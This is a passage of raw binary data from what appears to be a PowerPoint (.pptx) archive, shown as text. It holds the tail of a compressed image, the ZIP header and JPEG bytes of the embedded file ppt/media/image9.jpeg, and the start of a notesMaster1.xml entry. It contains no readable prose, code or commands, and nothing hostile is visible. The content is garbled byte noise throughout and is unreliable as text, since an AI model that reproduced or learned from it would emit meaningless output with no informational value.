..ibV...)..~..r.Rm..."7.D.E)Y.S^zm..?.}....Q!#..i.O.....z.l...g........~...^:....|...B7.sE..fO...._R...~9l......sl..........B*j551.......x[.......696+]=c..=b.7.mo.9dQ..y..}..x.!...~...Q~.3/..~..-..JC..h.........[PW......+...kW..nDW.....TZ.c.{.....vQ.A...........k......2@3IV...&....Rl.g+[.&..~.<...7...y.rv..p&.i......u]..^.......X.g..=..q.1V.....IY....S.c.]V~....A3F...p....IcO....J.W.....{c...9..a2W.@..........9.@7`s....\..S...6.NP.....\.%......K.ne.6g....]......er....BG.?'....5..m..=......o.0c.5.{.\....w.[...u....5@...k...Y....Rk %..X...b..[.........c.+......5.'.I.. ...c.._....
..}..n.x.S3.p....,Z.3m|a.....k...G.....fz    ..ODN...~.,\|4f..........C...EP',.}k..].ijUIb.Z..XRw.......AU..Y..M...2.PT...{G.*.....)1.Xu...b.s7..=......Z.mhP...h.G.Y..).|]x<...........$...vh...'<j7....J.*9......c.@....0..j.(aG95+..Hi.8W.....K.i7...x<KU../MOu.hDN....-.q....o.....E......_Z.?zg...\...ZC`..Sc.Q{?....:.C.=...!..    .n..p...z...8=!...../..........f~,...bO?......R...+...@'..}J..t..m>.$.9V....@.B. ..|.J.....f..Pp...._q~tx..............Z.E...7g...l.s@.&..f...~h.............Is........^.N"'....9.D.tJ}TN.21W.&.W..[.&q....=>......I....#Xz.Rn.w.(...)-.?...p.W.z.."R@...?)..-.._.1....G.G..z...........a...]..S...]...&.A...Z.@.Z.=z.@*.
..;d.]..@> );...5.s..a.Z.........'.........<.H...g.h.{:9...WT~F6u.P.y-.*.>n...;.....C%    e....;bYo..[f.w.x>..:_x....*.....{(2..)+.......VK.gK.K...Y|.r...?........2...C.5H.#I.ys..w..k..Q.e.Z..>.W.'7(s..sUfV..#.8n&.t....z.le@J.NWXT.....s..H.........>{v...Y_.....p|...!....s).g.*..Z...K....W.w..
.QqE..C.xG....V.....c..2..[\vY..............9o_....5.I..FG..PQ.k...Na.3.B?^.{..c9.l...i..E'....g...J...MJ(~.%+g...4..........,....2..........F...m..=....=...94..VTx.....K...7r..b.Z}pn..]..../3h]{go.W...i....Hk..M .(j...3..@
a..oB.....'......?............w.U/..}z:o.h..^.b..V...L..*]......O.....s..d"g..P..{l....=....`N.`.%.+.J\..nR.'....'._..~bF..O.....3.{...s.|....l..........$l..*/..:K...=.........S...}L<N]]M.........^.,.....5..&..l..7j.u.le....    N.%....,..u..V..8.....3...2..,.....;...p...i..F...}.......{...{.Y..Zd.......4..f.....K.O...._.. ......A.
......j....$.F.......m.....5..0H....yf.....6..W.<D.>..r....^.}....U.W.Z*...l.....5.?'..J$....}3..y.y.Lz-....I|.,Y...O.3D..bq...:}.Y......n..2.......Kb9...yO.
.....f.eW>%.~a.............c.H.Uj.(sb..C...N.O..
'..l.\\J...=....g#.f.F......|..o...z...K..|I'. Z...o42....|d..I...-.L..........I[.n......6.....[.x.v.....O..w.....o.v.yy.....d...)>V....5...,.gc.3/....L:..=....2..X....#X...3.G.............oH....@....X..|.....R..D..;....O..$...J..2.\,.....G_|J.........<!_.$..K.~.u_.qnq~......k..h.9.....(....#..SV...x....R..B.........w..j...ha..z`is.}@.u.L.1...g&.N.'[...(.O......H`p..{N.]..g.X...L=..>k.x.....<7..?..oh.ca......4y..O\....K..`..d.........I.d.n.G...>7..:....Z...Y.....Y(.8..w.......}....:..OO||.Z..w.W..PV...y/..`.>...rE.S(tR.f...Yw...K.<..Jr..............n......d..........|d....M.S0b...E..>...(..k.t....o..w...N.hD%D.........s.....^t=2.....e....hGC...{F....<..pI-...W..?...H]..h0...y;.L;...Ay.`.\..T`!U.NQ..]/Q0..3.........|F..H.+.zps.._..:x .....a.}H...5...S.K+^$.?..#...gQd.K.5...g...V.).#.=.......jV A%...R.......K_.|...W....T.....%b$...=......A...9K....I.~.`...q..<>.`o...?...P..P.{.3..r....Tl...z.a.%..|w.........ac.b..Z..5..+..w..
....O..C..<.8......-.-..z.Zn"J>G....6..}..^.....S {..7z...f.Tv.ZJ5j.->.s...2+...Qo$..K+...E..........9t..,u,%......o..GgY"...}......G.~...C....s_.........^...n....u.......~.^OE.3.6.U.k. ...._.....M.n.<....1..,x...GG..w..u.oy._R|...Z...y.J....;~...?h....7.}~;.<)9]......./?...i........oT.>.
...=.{f~j...........~.{4...:.B?.9'e...p.n...N.-...C..~...........P.p..bR...P.aE........=A...<...$.z...s...'...jX.*..>sF...y.O..X........U....o.....x..p5.....zw..4...uu...?....p4.....{....N,.[...k .........Z.o@............. ..+I....~s.0...Om^. ..+....v.........."...e.6..z.].............F;.B..N...7.....?.g.....    .r.:.9:..[.....-...$_.c.oI..    .O=R!.r...o>9.b..g.$...>.R..).)<...z..B.C...b@..$..2.hGv.6..m.s"...Q..Y..*..UW.*..$b.fYH..n....:tKH...R[U..=....W^.6~...h......~~.w.I|.)(....S..v..U..
.-l.8.....i.xW-.~.r...L..ls..3W(.......AYWS    R`.l|.5.}.n.Kv...E    ..[.;...y..Muuqv.Y2.c?.........Y..#'.    ^....P=...... %.B.......G...:L..x........d.......[....i..G....?.7....J..r.'....gO?_.D....e..9...."9....>.    .._.......h........    ....6A.......]..i......!..@..;.~=..,qR.L.....A..g......W.G..r...um.......OK.v.....vmg.<..".....7.Oz..P.l#.o.o..OW.}.%...~.....U.G2......Z..Z...#..']..0E.P....._.zR.:......z....."     ..U.4...rS..lI....}..u........\.................+|.....+.....bEo.<P......D...{1S.0.~.A?U}.^..A......]...8....)s..;...*-../.FU..f..........:.f.PR.,..Y.*.    .^...S.....m^....{{..}>.Y.@G..q.T.g...l..}.Y..Ig..b..}h.`.g.t.FH.s ..;"w...
.Z.kd.v*.@k.iy^o...r..m>z]....,.^]..tmgi..._...T.Y#.......Z...)AG.    3..n    .    ....M....^.U..V.W\.!.....c.9.{;C..Id......Q......K...:.........:.D.V....B....&h......Y...4.\..?...j..H.M..]yc.z..).&.5...`....J.........D{.)W1..<..S7..;...n`.....S..W4.p.J..hIc.....T...w..3.._l.....q.`........qbN....V.....i.....#W....%.YL..i9.=..j,1#Zr.#.>....RY.QW.d<P^.......|...$Ww.._.v....5.y...#Y>....(...?.GU. n..p...9c{g.i3..p..V.ge..........$.....]n.....vmg.....H.v.....v..A^. o6...{2..iQ4..;.M....I.o...j...^D....H........PT..h..*dq.2....1p,.J.|.U....8...4I...]lFj....w.%...*..8...J;........?.h....f.@...(#.O........c.x......    ..@...H6K..
4....1..a9..-z..B...B...|..z$%.......<&.>....E.2.N.C..hM...~_...W..5.lCR..6&p..GS..\........<9.y`......x.+n....w.y....g...DE..;..w...so<.@.i..>UZ...`0.r......g..._8..+..w....6t4..J4........T.....+=1.^.G.{...#..D..~n...W.....~....at....|7...`A.O.L.!..........^.$..e.K....jEHC.5    .70..0$.l;.yvz.A.....'.Or..}.m..k.M....).f..^.tuu*(hP.h,.Q.R..+.r? ..........(9.`.._.......B?j.r.........[.0..k.. ....*...Yy%. .a.:D......p>...v...t.g
.W....K..=..d..2...G1.8z.ux.LG....={...=.....<...}......r..uuu?..j...../....X,Ft@VV...~7.+.]...)...hG._..y.Jei.Z..`...yA.O.w.0...i]%N....u.P...1.Ts3..^......\..t....x9...F.V.b..:.M....!.......G.C:...y.W........@........u.@..t.@..t.@.....v.....{..G.{..G.{..G.o6....7.................vF...................g.......X.3}.....IEND.B`.PK..
.......!..9...D...D......ppt/media/image9.jpeg......JFIF.....`.`.....C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222222222222222...........".....................................
.....................}........!1A..Qa."q.2....#B...R..$3br.
.....%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.......................................................................................................
.....................w.......!1..AQ.aq."2...B....    #3R..br.
.$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......wn.kl..'a....G..{.....W..\.=........(IT.....:...O..q.......In..5.j.n.....a.......M.A.5J..##....8..^{}t..:..]......F.2...}....5kP..[.D.u47.....HT8'.....9...9Y.-U...:...j.^.o.....v.P%...$)"4..r...zdv..U........Xf>A.....n...8.M)!.......8..V..|...?6?.v.\1|.QK....DK...&.][..gWGz.5....z.sq.G.4....7.px...:...g.Y....[....W.q..}.x..8../.
87(...;..R...]..n}I|..>j-.."...
.......).}6..ynb+..)%.z..[Q..lcV....E.V.!E.P.E.P.E.P.E.P.E.P.E.P.E.P.E.P.I..)k$..n..............._.h....7W7...v.\[.......<....>..cP.H..o.B.
d"}.n......5.{....xou..1Z.6.mn"......q.s..#..U...\^h...~m.2Es.Y...H...vc..m..3...C...]..mr....e...A.q.)..l%.....[.......^...*<.YUv+..NO..@."..4yu..nb".[H...4n.F..$.0..^:.zU)<;....O...@.g.....m..W$.k.6..^..;-..tK.......X.m9[k]..1..`.q..:.....5.......s....}.,r).r..p........y..@j.jvB.Y..n.....O.q    ..[k.H![.8....=.]C.!.K..WM{i.9..%..H.....71.r    ..)Xk....t.u8...+8.    .4v.:.\...NH...I...\j-.A..Iz..l......... .b...9...........7s\..&.....
C....b....9.m...R....5...e'%$3`.>.$P~..}.<x.Y4y5.`...rTI......}.q...<.9..W..;.}[O..m..[.....c....0........y..$.C...q..>... ..l ..m....99.~_..j]Ft..Y^........t.....~^0    ........y.@d.%.,....i$.K....E....8,K>....<...Q/.]c"..d..]...E....ml..).....5...<n.l....<.0...u..N3Xv.....g....u..q~&...A(....
A....;t.......{G.&.-?V...%."[.$...$.p=.:_..^)-Tk.l.s9.d..&E`..c......Y..w2xK.......6.4.........r..q..6.........Xnl.VX....S...d..\y.U.G..x,.'.k..i...j.5=:.#3..Ix..+..sc..NW..s.......h....-.P.4....l..'....pk./.k.u.Z..i.W    %..n&x.$.....b...].9..,..m...f.k).D.NF.T.S1<`.?x..x...ae.:...--....!.5-$.0UU.I'.*.~%...e............3.7.....q......c..*<.m../..A).Em.F..8.......C...$...e..-....6.wsh$Al....IP....8.....l.:..Kt?.;.....K.ZkW[.+(...;.bI.............F}6.M.Z.\-.....B......s..Y.O..=..N.K{4..c...O1E.D}.,.ZF.9.(...s...-..    .Y.X.p...i'.!
.RB..v....~b    ...J......E}4j+..5.b..\...    #~q..<.5..G...Du.0<.4i.....`@.#i..A...;.]_&..Gc...Gy%..."*Bc\;".|.9.....e...._...1.n.iv..../#pn:...9..FN........#.......-....R.J......I88..zU.5)....s....4...J...0U....Ny `jzE..y>..~z........b.2....K..`d..rqZ..../..E2Ccf..$....h........e....2}gT.......+....".......K0V .F.....l..g.s^ ...=/YHnfX%1\.Q=.X..nH.1..,.;I.@....@.zW=.....o....J...L......9.zq..x...J.....R.o.e2..0F......."-......$..4....    F.wqs.B.."..Eq$.*.8UY.0.#..B.FJ..6m.a..YB.@.;....E3M.m...,(.F....q...G...+Y....G:.m....eU9P..J`.F.0@=@...5........ap$...g...;.bH
H.q.J....:.........cq.....8i.6&4....^.I. g.K.._Z...........);.,.    Dk.....9$...
.f..J....N..'k...X~.*..#E]......    \....Z.h.t.u..-.{[..Y.{d.6...*wr.#...(.=.6.^...M:.-.[7.Q.<..WV~j.^A.C
J.W..r...ksJ.4....\.V...@.5.-.*...^5.....=..^....d.<QO$.......Y.>..wH....`.........+R..32\H........,.(....?t.3..Q2=S.....[.[...........c.p..c.....C.....6.E4.t...o$..$....A...^.E8 .........Z]\[4.X....]
.....p...A.#....1..j..hg2.Rr.w*..!R.b...*....%..?!4.Z..S........Kn....H..s.f...Kg<c....._Z...t..O.......Y..1cm....<..Xt.'..ml......,...2N].f<..k.|%b....t.....s.>|.....wD.c.Sp%r.?.%....u...[;.....[...%'y%.a(.v....$.X`.[.._k...i.[E..f.....G....PB...RP2..... .]..&.6.s..n...F.D......9.......1...t..=6.V.yd..j.....+..T1iX.63px.'..i......i...t....B4..k.[.T8...k.3...{.8.<ia...`..{L...6..3..L.....C..f.uk.....Z..r.{.....#..*8........~....ipj....R.<...G....N.k.......jZ..-..4.. .5..FT
J2.\1.1.A..../m.f..i6....F    ..Y..O....UF...........kH.rYDL.d ....s...Q.70.<i{s..^hS[.d..)p..G.Nf.2J. .1...~,]n.-..x....H."].9:s.dB.l.J...th.....3.y...[.....?*.rPr~.;z
.m.........w2C..:..i....d...).I.k...[.'Z.....k[-*+...c...e..    ....X.s{bMwY.L.<..o.4.u...nL.t.~.....(...Y]xc..)|.sO...".w0%........pw.`......a.k.3..}....)..c...j..BU..."...H#./9.kk_...........Yd.....H8<.EsV...9m.]....7...V{.-p.o.y.UT.>P...EY.oe..\[7..;.X.)u..n...#......c.... .......ckqx.V...8Fu.E.=.T......l.T...rqcS.....-.hs{."k..M......<v...Bp.1...GWs..]..I..
.`....2..x U-S.zn.q.....a..d.....3..ce.2N...>....KMNd.........5.V..km.Ww..h.o..#a..X.....@.w...l...s.y.,..O23.........G8..?.....!0<iq*L.    .....)VF.p...#...KxR..(#.R4..I...1.1%..$..hP..,.5X..u.6..Rj.q....4".t.^c'h^#!...88......K...$.....+.Y|..T. .o.X.l...H.1Kq.G..<Ap..\..._.e*\+.......K$...y .    .....|Iu.[Ou.....Dx.'....:)l..O..3[W.8......qspm.......p..cr.u.|...A..    ..[...h..-nm.D..^&Y...6..2.B.'..9..w3|
....g...!M.w..!+....|....fS...G+.G.lQ5[.....j..t....o2..;..p....g....Z}.N...&....n...M.n.O.G...x.i...=..K[.....I.F$iU.....w...jZ....<Q.].......o6.[.....`..L.gvv..S..G.........h.\...jg3...-..*...n...*2;...W.z..t..`.^-.\].. .c....N.>.....G.....G....F..-..w..    ....7 #.U.H........b.....c.|....."..>n....'w....^....?.Q.;\.....}f+.}.. ..I.n.19......y.# .]T.).........1....i).$p.CH...z.-..i.*.<....E.2L.k)@..ya..g,@.    c..r(.._.r?.Kx<1'...4.5+...,78..#m.;P.q...)..k7...W7Z.Yl.....v.6.....    ..e..1....<e.v.cL..{...f}*.F..2......1...@5.e..>....$.8.<.i*B.N.$.v1.<.=...n.p...)$WQ}..V............L..P!...0.....i.....t...24.mt..~_..e.......9...V...m+CvK...b3H ...1....m........\x.L.....M..TfKi^(...^@.....A....mn..w..W..uk;....Z.O..M..m}|.]._sE2..s.]....
[......}....6....R...7... \....RFs.6.Z_.P.....F3.Ii?...yQ..ZP].|,D..3.r9...-F...\B.Z..|....p...R5R..B..$..}n.C...{...r\A.....p.-(..$P.s.e3..m1.W...I......[.j.e...Q...7.....h....q....3..IKXg-xL.....;O.......dd.....-.^mWV..Jh..[A}4...)..Td.,C...B1...$......\..-..5cwi`...R........E.. ....1.....:y.K.^...m.X..mq"C.
.!.
..1=A..0sIo....._.D.M#$p.co$...+>.7..y.........G..5.Yb...e3..$n.*...n_o.oC..)M.^.....-B...l.T.#...I1*L..@G. ..J.....U..mC.1;j7n,..~.U........6|.......:]...;.I"..`..TVa.VtB..#.....Fki~...,,.    f6P.e%....$d...`..l]..0........?..tD.>    }9.|G-.......LP...._..X....}.v;..5...X_$.......[o*3.R..U/...r>\.as../.Z.{.......g..)?x.P....[.@#9.4...!....v@......x.n..N.3...w.=)......$.....hw^D...?hHr1./o6..SV<?..o...g....w../...........SQ....f.....Dl.H...D...AR..`.F....&.o..]L..}*........1h.o..l....^..Kt.[..D..Z.5.........K..h-.IF...'. .r...+..~........7.?d...I..`.....9..mw...M.[lI.Au$I.Q...l....'.y=kLt.l.p...E...V.O...e{qt.O.j..,.ht.....1......q..-@Y.k._i.iq.s..m..t1o\.I...J.....d.)X|6.....94....[D..HH..a.d.q.@..]...Z.xbk..}J......<.{s..H.GIP.l.]H..W.......CP..,....6...D.*..F..D.^..~......b.x..Y.B.......).m$1.......nG.....{..ob...u. .e.6*b.m.%7Z{......fM..x..Z.s..y.5.g..f..Mj#....0.g9.Y$\s..<W;?..Ev..I...A..{r........"(.....z.s._j2.h._Al&.c....q8.1....*.=ua....?.....Z..kQ..)^Y.nl...,X...XrF0...:.*.....d.v1...E...[.[..R..'TB.+.f9f9n....9.]CZ..+.#.H.._m..s.~..!..}..#..KV....T..[.$....pV9..o9`@....I..AZ.....uWXY. ..//a..m..(H..$.mPZ=..'..."..........4........."...
.N.s..dg.f_[C.x.O...Csy....
.IT..............u.ng...R.i..!.V$...5(.....$.    Z].s.K.q....i.....^^...H../.
.c..;.=...Ka.[.-Z..=R.......hCH..&_0.#.>m...'.S.<Ewm...yq}.[...cm.....<...y.....o..].Uio.$.5......a    ...pL..../1 =A.2..O.+..F...qk.o..T.....Kx...2......bp..c.<.w~......4.g.9.k.%....(>T...B.e[.$z..........g..5.(..u1...g;....:|.k*....i]j....0.Mn.Z..[-....dl..._s.N......:~..<-<r....5.....G.l1.,...y...(.pA.j....a...e...[.%..........2....=A.g&.u...5.......GH..x&....2.^$1.b ....x.[....<C.C{.....kmmg{-...5o4..K.b..H.0.;.-P..:&...e>.-...".....c....'.W\..;...1...z..s...p.L....`.o.%.n.*KH.9.x.q^    .{_..X....k..o._.N.O.:....7..'...$...........+... .^......o..o'h.l...5.6.#......m.qKi.E&.n.L....
.:8.C..?.....t.N....kh..K..b....t- e?1.36@\..Om...U. .F.....My.........Wky5.o;j.2...*....a@.....O.a+.s.........U.;..VY...4......*..8(....b.x2Y4.[+.LM....z<..[.....,.r.\.`....b.....}7V..mB}.    .d.K..l.EVb.....G8........u-1dmZ.I.^i..oZd.9\4*dp.NI.!... .-.%...st._Q.y.5]Z...[.k{C
*C0..L.K1.'v...rk...Q..Hn...r....3...#.
...1.....5{.....o.....G*.....u.......Sh............+.m.p1.......{.7V].{|..U..v.mi-..RC.V.BK9...2O.=k..J...-V'.h.u...!...adX.1....p.....j.l.qx.SF.....a.+y6......@.......ah.q:...R.I..&i...R../.......v...........v:.h...v..]9a.;x....]...E.?.x.uGJ.../\.../.-[.773.
<.H.!%..nb..+......L
.t...M..U+"B....`.........OS..X5.t.!.    /.J.7..I.M.y..`.......i..,.&..v..:|0....r.t.<....m.g,.4goc..I.C.....cm=....[..&.....$^x`....}MIc.izX.4.2..#..[....Al`.d.............-.l.....[{....C;....i    ?02..s..CN.5..[{.B....}}...Er....;md...0..6.Yy...Q..+..O.....'.G...A.t.=+T(.8.......wt_F....Q,.[....O..9Iq...7<.$.f..kO.^^i.....S._<'.w.F..@cF.<~....nu...&.>.... .vc..].@..9......t..C..S.Oo(...}..l.$.VS.f....:...k{......=..-&.iat.b....nu;....V....?.[Q...n.i........U....S2........cN...;....x...\.*.a.'.#.[i}.T.X.....`RZEc.js.F.o/...0.m........u..k.........M.-G.^.i.Wo.m..*.g%Hd;{.p........I..a.0.,"vX.[HY... ..~W,3...]..Z5.Ylt.Y...U.K.yd.V52.`neRzgh. .
H.=.5.........r..%$.2_..    .{...xCX.uV.H..k....t    e.2....1..W;...@<......CY..wv..h.r[...c.3J......8 n'q.8.v...Z...o..........p.T).s.@..1.i_.oB..................,    .&._..~..ME.J...u5..$.4..Z.......r.#r..*GZ..L....aH,5.f."@.8.b...X..8-..8..K........mmE._...J#@..G....!..H.%.tmf...OA..a......Cn..(..:...q\.......xH.p.x.L..]...7m....Q..s....<9u......q....{h....
d.y....W..s|...d/5...v...... XKY..*abfP........3Q.xW....^h:]..../:.7..tU..G....=.V......om^.v.....<.....|........X.G...(/R.]F.NM>he..[4.yH.`....9!...$.y..........mv.N..6.la.9........U.0...={c.].6.[)HbH..9..Af$...$.{.\^................8lC..f.^]....|......u.:]OG...%.2.k!.    2..~...."...,t.#L....J....>l.[.o&NN..'.y.[L.t.F..h.\=....Xp
.|.d.+....SQ.<..$Mu.^....8.g.$
V%..&...    9..rsM.|.,.z%...,...n....U.....!.G.F.........J+...1Lt....S..86H#>h.<.bFT#.    ...Q.. .%.c..x...^H.3l.;u....@J..N..S.....:..4x.V..I.]E.&.m.Lr0~|g..i#.t...o.t.x%..n$...d....79...$....xN...............B...mVm.h )....@...l..F.ct.l....=......Nwr......c.....]v.[..w..tT....w.... ...(...z..}M..Z]h:u....9m.x!..G.PUv.......E..>....o.......N.....l.)...a_...7NN;/.ZO..OF...E=...I. .e@....).F.s...O..Fckt.}..g.&&.Z/..U..}. ..3.......r.\..jw......I    ..)rv.D.......s.-@..?..le:L...n......1.p.y.I.d..$......|C...Dth._7.x..h.....`...u.J..\.M...hLW...~.d..hh....A...9*2NN:.O..+m|.C..)d.<.N....[..f..[n.g.8..@.e.x..;.n.<=....@!.E.$...._.....C.<.....|C.lu..n7Gs.8.qn...!
.w...%..=x8..)...i.k...JGa......H.?.......y...Zo0.k.5.R.J.%.0.A'u..l.YK...*.:.B.2..&...t.k;...e.$.....&}.JJ..d...h.i....k]...<...+....E..VH....;.a.....j..
A..or...Cms%..Lc.c........9.c....O...~.-..p...}>U.E.,..d`...F{.."..V..[...c..\.Z..."#....y..R=.\.,....|.k0x.4..[.j...j)kkgq-.n3o....<...g.......v.S.Y^k.fd..H.A..... ..=..B:.U.|B)X....{.x/.E...1..G.iA..H..`B^c-.{...Z....cpdApJI.J..Qh..c..nCc..@:...g.d.....c....T...H.b3...j.......5[..N...K.@....".
.....7..b........k....>....@..({.....%...:C$.kl.R..."lbp7........s..u..t.GJK.+k..k...{v.V.vo.zHc .r..<...E..2.C.O.k..k..Y.!x.2.=.R.@..`F.g=jM'A.t..-V.Q3]...O$l%o$D...v..@9...w.%....6.
..V..iL.@X.........8......}...{eu,r.#......r....\`..8#.-....,%.[.U&.f..n.h. ....:.G. .+..E....[...[.4..7SKn.M.m.!L{9..... ..r..i../....M..7v.].V5..! 3.q..........&.o<5w....+k[W..Z    ....&....H%...2:.i.6..=.q...Z...'u...f..e...v.8..l4.C.7>......P..3.2<...X1....#..v.=9....x.
.p\....M!U...f..@"........U......5.......U...t..Q.b...X...(.x.V...i...=..5......f.3*..1.t}....=9....gid1...vPi...a..%.A.wh.S.l...1.]....[.1._..Cpc.G:.l.....V..nH..z.=.x......$z...^./f6.....d>...Y.vc..8.nY..A.\]y..S.P[.+...q-....>.9.!..4.....NU.Ke.d2...J.N...{...........Mk..q...SI.[9XUIo>S.....S..z.#.......V.\..i.E.3..8"O/n..;..:.M.....[.SQ.._.fI.@...T.$j1....=...|3ouu=.]......Gqn..&...P.T...0n...-.....i.#..5;+KM<]4.A..q....    .... .I;H5.q..{{.a............0..p...~.d..7rx8.o    E4wK6.....k;.g...w.........G@A.
.t..S.....,.7.*....&..h..pX.#.T`..G\.@.k...u(.......i.......\2.........<WH:
..4.&..>.|.......T.]....q6G|m9=......+.4...?eoyy.H,f.o".{.
.......v.q.$........u...'..k...6.h..n.....r.<.x...r.:......mu..m....}.0.:.r..7...n..{.P'.n.!.mS..C-.C4L.E...v.......#.|.y\t..4..    a+k.-o{3A..]Fc..X..c..g...k.....u..%hS...E....6.GQ..Q.^.8...{.....%.....nm%...m.uR.........qU..:..n...    ...M...../..N.
..PS.Yv.X...=.x....3k.`X..&.<&.,3..PH....u.;.....    m...x..Q...c...c......-...>.R.PO..r.4Q.F....b.+..g$s../.....MI.....:...Ia.....!H.Th..b@|g..z.]'..5.........O![b.....p.
.@........_..R...H`........*m..^I.....;.1.hq.{.......Xd..O.._ZH..}...g..q..:...MZ.....L....Z,..[}..nU.?!C7?p...J....o5......W..J....[...r.).....cV4...6.{.K.q*.aY..y.F2U.fb.+..#...;.s{..{.:D....Z..Av'..Kau3._...8.\..a..c...sV....nK3l.-...3...[/......*z.<...js..e.m.{I.#.g...fGTB.....g,..3...n!.....!.F^I.*..'..T.....y..x..Z...m...og,....Z.v...(-......S.._.M.E..k.f.l+......Gf#&).2G..bp.....$..iZ<.e....1.."]N1.1.K.9 ..I........}...5{F.#_-...H.h9.Fc...rI.......6.'........e..<..)?]....G!.O.Z...    c9..wy..>a~.H;@.9....v.M#O..Q......\=..nI..+obF....c.q.U..|3..Z..j..mk)0...yi....F...%I ..qK...u...{...'hV.....T..g..7...T....S.PK..tq-..-%.R.0@P..(...=.}I.!.....m.4...]..m...|....r.....5.6.9.....yq..a.$m.<..1.i......U.K...q...../.^.,.C$...*......g.|..7/Z.....U..^NuU..... A!U..`........M.....Vv.zm...U.ehd...#),..P...^..<.jk_.}.G}Y.Z9mM..Hm.zm.....#..=.GV=.....5.../c..H,u+[t...c.$H7.%w...A.0}G..5g..N..km5.z....y*-.a.T$... ).... c...<Q..._.......]....).,..G.}}j+...e.Km.V.[P>.......}.ZEf`......O.y!....x.U.i....6.}...G..rM..1.....)%H....<.M.....w..%......h.......]...3.].......MzH9....(.F.t.[...l...5..}#...
.{...a...-.....m./...Wr.Io.'... f.+y....m.p....9.Gg....%.e...2HTym..L.;...c.S.c..-uK.6..@.u..........Q...m.&..9_.eT...iau.o..;.l.F.csr.\...B.    ...2&|.L.#. .U..I......F.
......?......<.X..,.........-.v.F#..:.n..T+...[....E....xV{......iq>.o....r&.*...I
....Fq..+...E.....*....%.....;tk!,b...&&....8.I..F..Z..Cy..wQ_.........KDI.T,.n......"{].[.T.....:.T...    ...Q7..f..7]. v.S7.".H.....b..e..c}...g`....z......6.....}..9 0.........i......#...k{    .b...&..|3j~.......v...RW.N.....Z..t.4.K.d)....A.p.I..........Ow.-.z...WB.Mo....n\..-Y........-..X.i.<W.......xZR.......@D. .>\..s6..{...gZ].C...%...[.@...j..P$.D...0.v..'.1^/.j6.<...w2E..Z..T.......T...)R.<.Em..V.....&..g..r.J...Ts.%R........8.....X..... 7v....g/2 ;.$.#..A..wo....No    k......y}..%.jsY... ....r<..c....;zM.....e..i.v.{...y.LY....w.p....I."..{.7.._j
..y4HR.YWlr..#e    ..........V...S._...{.cijf+....Q..\33`..s.(........I$......4.....ldD.H.c3m(.&.....&...m...M.^Kg...I.....,..q..k........WZ2.J;.f.Z.5.l|..qd...N8....!t.........i...Mm;\.r.D.....<!.a..    ..8.....a.....x%..]Vf.12J.y..`...w#8.K(%ZC...4.._@..B...u.1...eT[...J73n....1.b.xw\......~....0..Gxl...YJ.P..b.OW.
z..l...F"-.H...x....&..#"....00~L.p...n+n.~0........]O..FX[![m.d. 1..I88..U..;s.....S>....E#J.#...b..........)u..b.k.t;W.....v]@..*.F.b..4..J....2.X.54M"h..y&..7.kr..y?hc..Q.d.s.A'........./.....QEqkwu..<....QP......X#%{..5.k...<P./4m.+.umo.Y.%.9<`..G=eAR..?...g..-k.X...{.&........gi..z.M...Ku.....-..Z...C.....v...>..z....7.........z...J......G.......)|%.'......^..t..<........X....O....\.Z...4.&?8[.D..*F.    ..8W....>..G....Kk...i....hn...f.).B.#}..n.GNNN...z.c...Ut.6...g........l.FFw.......J..xsP..;.`....@..Z;...!].s.._.'o......>.........[..xf.    ....!.)%v.....wH...L.M.x.m&.r........r.$.F.s.    .X..5...    ..Q...;mGL.U....$&9.#..9    ....zwR+'..    ..3u5....X...b.....0.=:.G.U...l-..->k...[..5....+n!UbC.....~..rH...w...um.G-..nf.i..<......>.....g....WI.....S....d....[I9&)..W.F>.....7
._.^...n.....o.[Y7..*".2..f.......+N.............o........s...o....U.A&...&k....T....x.x.Gs....(...8.NMz......
M...H...Kdb..rXL..R.cn.\..ux.]&...:U.w...$...g*d
7..8.{
.....Z"......5...d1H..>.nO..*..KH..1._i.&..n..A.{.=h..E....6+..jv.<.ou%.....9t.[le.!&M...9.&.J......y).5$...eY...G.p....`.
.....<..@}...+9...w...\.2........US.|..."xkC...$....F.K.....m.a.s.A.8....Q...........A....F9......).....G....P.a......Gl....;6.r..;...09.....}.....I{}{G......hg.Y.B...l.....pr6...Ea.I..]..#..A..A.F8$.w+....pI..F.%......h.%.C!..I.7...g#.....o.j_...7.".x...T.'&#....K<..`....@.r....wY..5.....+k.;.>.%.....C(e$.v.!...].......7....d...:..fP
.......%..........+...G..Y.#<.3........<~'...."...(.....?.`Z..-*......3....W$.OVv8....u....V......U..9av.&.,..DnJ..*U.ws....?.i...q<
..O...6;.62.........f.xWP.\....%.......d2.#p.q....h..NI......[M.D....]A.....$.'I.....#J.    .;.<............I.[..K [.}FI.{...H.....rG...-...N.[.}Z.Jof....ax.wc...` .;...|T.....[#..Gno.......*...7..\.. ...BE0d..:>.... ....&.S..f.....2.p.. .{.WE..[C;#.v....'.I.xB....6.#.p...i~.M....=B.....C..e..B.B....w9%A.....5[....!wC(......x.1.&.P(.m.K8..&mJT............pp3.y<..%..ig-...k..Ky..w.R..hE
.3.AD.T......M3......c...l...,....o.......~]ZI...u.%). ./....\..prp0.S......V..Z....v.&.....h.D..l?..27/
...u..=4.6+Ev.`%.o.#.K1.r.....?
Z.....\\Z.Q...r..J.4gs<l...8..zb.5?....-V/.._g.HC.g.d.....@...8a.........,...........0.0J.Sp}......9.=...<3.....]Am.n..s4i:K4D......8.F.$..+m|=$.../5[.'Y..Xn$..U.*b..C.X..`c....rm)-..S..maXm.@b.T.Y.1...<...rX].._S.|<.7z......%...y2+".U..6..B>e9..q..m..2..nb.P....L..IY\3*....>@..s..TuO....j.F..95...m..c..u.....|pG..0I......^..z....H.........Rd.............xkJ......3.....H.....#.".~V......=#U......^...x....%..1.o....M.....O......o....c.c2.#.A<.~+>...S.kki..........%..n!.2q...z..h....../>.....e....a.!......#.z......w...
..>L.....G.W.a..e.....5.......}......(..../2..HI.0n...\d.....>.....n&3M$.e.G.s....m..H.O&.+.izU.zQV{..%.".M.......A$6wp    ....-m......6C.k.k.v....../._...../>K....4...    q..r.. $...#<..2.[.*..{.....'...J...<.I....-QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE..QE....PK..........!.,f.Ps....#..!...ppt/notesMasters/notesMaster1.xml.Z.n.6..?`. h?.4.,_b.)R..
.]P..oZ.,!..........8}.}..l+
